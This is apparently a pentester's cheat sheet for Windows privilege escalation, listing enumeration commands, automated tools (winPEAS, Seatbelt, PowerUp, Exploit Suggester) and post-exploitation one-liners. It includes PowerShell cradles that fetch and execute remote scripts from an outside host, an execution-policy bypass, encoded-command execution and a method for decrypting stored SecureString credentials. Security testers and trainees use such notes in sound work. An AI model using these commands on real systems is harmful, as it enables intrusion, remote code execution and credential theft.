Windows Privilege Escalation

Initial Manual Enumeration

Start with the basics by hand, just to get a sense of what system you’re on and in what context.

Forms of Command Execution

CMD

echo %username%
cmd.exe /c echo %username
C:\Windows\System32\cmd.exe /c echo %username%

PowerShell

powershell <command>
powershell write-host $env:username
powershell.exe <command>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <command>
C:\Windows\System32\cmd.exe /c powershell <command>
C:\Windows\System32\cmd.exe /c powershell -enc <base64_encoded_command>

OS & Kernel

dir
systeminfo  # How does the kernel look?  Hotfixes applied?
hostname

Users

CMD

whoami              # Current username
echo %username%     # Current username

net users                       # All local users
net localgroup Administrators   # Who is inside Administrators group
whoami /all                     # Check current user privileges

# If domain attached
net user /domain
net user /domain %username%

PowerShell

write-host $env:username

Networking

# Config
ipconfig /all
route print
arp -A

# Network Connections & Firewall
netstat -ano
netsh firewall show state
netsh firewall show config

# Local network
net view

# Network shares
net share

Automated Enumeration

winPEAS

GitHub Repo

# Enabled colors if executing from a Windows console (not needed for a reverse shell)
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

winPEAS fast
winPEAS searchfast
winPEAS cmd

Seatbelt

Seatbelt.exe all

PowerUp

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

Take it with a grain of salt, it didn’t catch MS15-051

Windows Exploit Suggester

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python -m pip install xlrd
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -i systeminfo -d <latest>.xls

# Are there any exploits that line up with existing/compilable binaries?
https://github.com/SecWiki/windows-kernel-exploits`

PowerShell

Everyday Commands

# Download a file
IWR -Uri http://10.10.10.10/file.exe -OutFile C:\file.exe

# Execute a remote PowerShell Script
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/script.ps1')
# OR
IEX(IWR('http://10.10.10.10/script.ps1'))

# Show the environment variables
dir env:

Decrypt SecureString

$ss = Import-CliXml -Path file.xml  # Import file.xml that contains a SS prop
$ss.GetNetworkCredential().<propN>  # Decrypt the prop within the file using the current user's credentials